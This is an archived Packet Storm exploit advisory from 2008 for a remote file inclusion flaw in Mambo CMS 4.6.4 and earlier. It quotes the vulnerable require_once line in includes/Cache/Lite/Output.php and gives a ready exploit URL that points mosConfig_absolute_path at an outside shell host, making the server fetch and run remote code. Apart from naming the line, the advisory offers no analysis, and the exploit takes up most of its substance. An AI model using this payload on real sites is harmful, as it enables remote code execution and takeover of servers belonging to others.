Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
packetstormIrk4zPACKETSTORM:67307
HistoryJun 13, 2008 - 12:00 a.m.

mambo464-rfi.txt

2008-06-1300:00:00
irk4z
packetstormsecurity.com
11
JSON
`.-----------------------------------------------------------------------------.  
| vuln.: Mambo <= 4.6.4 Remote File Inclusion Vulnerability |  
| download: http://mambo-foundation.org/ |  
| |  
| author: [email protected] |  
| homepage: http://irk4z.wordpress.com/ |  
| |  
| greets to: all friends ;) |  
'-----------------------------------------------------------------------------'  
  
# code:  
  
/includes/Cache/Lite/Output.php :  
1 <?php  
2  
3 /**  
4 * This class extends Cache_Lite and uses output buffering to get the data to cache.  
5 *  
6 * There are some examples in the 'docs/examples' file  
7 * Technical choices are described in the 'docs/technical' file  
8 *  
9 * @package Cache_Lite  
10 * @version $Id: Output.php,v 1.1 2005/07/22 01:57:13 eddieajau Exp $  
11 * @author Fabien MARTY <[email protected]>  
12 */  
13  
14 require_once($mosConfig_absolute_path . '/includes/Cache/Lite.php');  
...  
  
^ no comment.. RFI in line 14..  
  
# exploit:  
  
http://[host]/[path]/includes/Cache/Lite/Output.php?mosConfig_absolute_path=http://shell?  
`
JSON